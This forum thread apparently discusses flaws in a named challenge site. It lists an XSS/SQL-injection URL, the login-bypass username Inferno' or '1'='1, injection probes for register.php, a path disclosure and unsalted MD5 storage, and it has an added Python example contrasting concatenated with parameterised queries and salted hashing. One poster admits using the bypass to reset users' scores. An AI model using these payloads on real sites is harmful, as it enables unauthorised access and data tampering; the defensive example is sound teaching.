a new site at that wechall.net thingie<br><br>xss at<br>http://www.lost-chall.org/activation.php?user=x'<br>(sql injection too)<br><br>if you don't want to create an account you can login using<br>username: Inferno' or '1'='1<br>password: anything<br><br>full path disclosure<br>/home/www/web453/html/index.php<br><br>sql injection in the register.php<br>enter username:<br>x' and '1'='1<br>x' and '2'='1<br><br>thank you for registering: Inferno, Kender, ...<br>The website uses unsalted md5 hashes of your passwords.<br>Which I'm confident you don't use anywhere else in the world. Not that I would admit it if I knew otherwise.<br><br>one final vulnerability is that this website is open to a lot of flak from anybody who owns Lost intellectual property.<br><br>just some minor vulnerabilities...
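Added example, not code from this thread or from lost-chall.org: a small Python/sqlite3 model of the two weaknesses the post above describes. A login query built by string concatenation is shown next to a parameterised one, and unsalted MD5 password storage next to a salted, slow hash (PBKDF2-HMAC-SHA256). The accounts, passwords, column names and iteration count are constructed for the example; the `Inferno' or '1'='1` username is the one quoted in the post, and the point of the example is that it only works against the concatenated query.

```python
import hashlib
import hmac
import os
import sqlite3

PBKDF2_ROUNDS = 100_000  # assumption for this example; tune for your hardware

# Constructed sample accounts; nothing here comes from the real site.
SAMPLE_ACCOUNTS = [("Inferno", "correct horse"), ("Kender", "battery staple")]


def unsalted_md5(password: str) -> str:
    """How the post says the site stores passwords: identical passwords give
    identical hashes, so a precomputed table covers every matching account."""
    return hashlib.md5(password.encode()).hexdigest()


def hash_password(password: str, salt: bytes = b"") -> str:
    """Salted, slow hash: a random 16-byte salt plus PBKDF2-HMAC-SHA256.
    Two users with the same password get different stored values."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt.hex() + "$" + digest.hex()


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, digest_hex = stored.split("$", 1)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), PBKDF2_ROUNDS)
    return hmac.compare_digest(digest.hex(), digest_hex)


def setup_db() -> sqlite3.Connection:
    """In-memory table holding both storage styles side by side."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, md5hash TEXT, pwhash TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(u, unsalted_md5(p), hash_password(p)) for u, p in SAMPLE_ACCOUNTS],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Query text built from user input. The quote inside the username ends
    the literal early and `or '1'='1` makes the WHERE clause always true,
    so the password check is never reached for that row."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND md5hash = '%s'"
           % (username, unsalted_md5(password)))
    return conn.execute(sql).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterised lookup: the driver passes the username as data, never as
    SQL text, and the salted hash is then verified in constant time."""
    row = conn.execute("SELECT pwhash FROM users WHERE username = ?",
                       (username,)).fetchone()
    return row is not None and verify_password(password, row[0])


if __name__ == "__main__":
    db = setup_db()
    payload = "Inferno' or '1'='1"  # the username quoted in the post
    print("concatenated query, payload:  ", login_vulnerable(db, payload, "anything"))
    print("parameterised query, payload: ", login_safe(db, payload, "anything"))
    print("parameterised query, real creds:", login_safe(db, "Inferno", "correct horse"))
```

The fix is the placeholder `?` with a parameter tuple, not escaping quotes by hand; the same applies to the `user` parameter of activation.php and the username field of register.php mentioned above. Salting plus a deliberately slow hash addresses the other point in the post: a leaked table of salted PBKDF2 values cannot be looked up in a precomputed MD5 table, and each entry has to be attacked separately.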
heh solving a challenge, after logging in as <br>Inferno' or '1'='1<br><br>reset everybody's challenge count. I guess that's going to upset thehivemind
Gee, thanks Rhican, for "helping" another community member.<br><br>But why tell us? We can't fix it. Tell the admin of the site instead, so he can fix it.<br>Perhaps you might even go so far as to suggest some resources about preventing this kind of issue to him.
Hmm I alerted Varg a few days ago, but he only managed to fix the ones I found...<br>Btw rhican u should try this site: http://www.darkmindz.com<br>Romeo would be excited to hear from u.
:P It was because I was logged in and too lazy to log out to try that :P<br>Btw Romeo said u only pwned noobs site and can't touch his site. Maybe u can find the original text in a blog somewhere.
<div class="tbscode_standard_quote_headline">Quote from quangntenemy:</div><div class="tbscode_standard_quote">:P It was because I was logged in and too lazy to log out to try that :P<br>Btw Romeo said u only pwned noobs site and can't touch his site. Maybe u can find the original text in a blog somewhere.</div><br><br>What am I, twelve?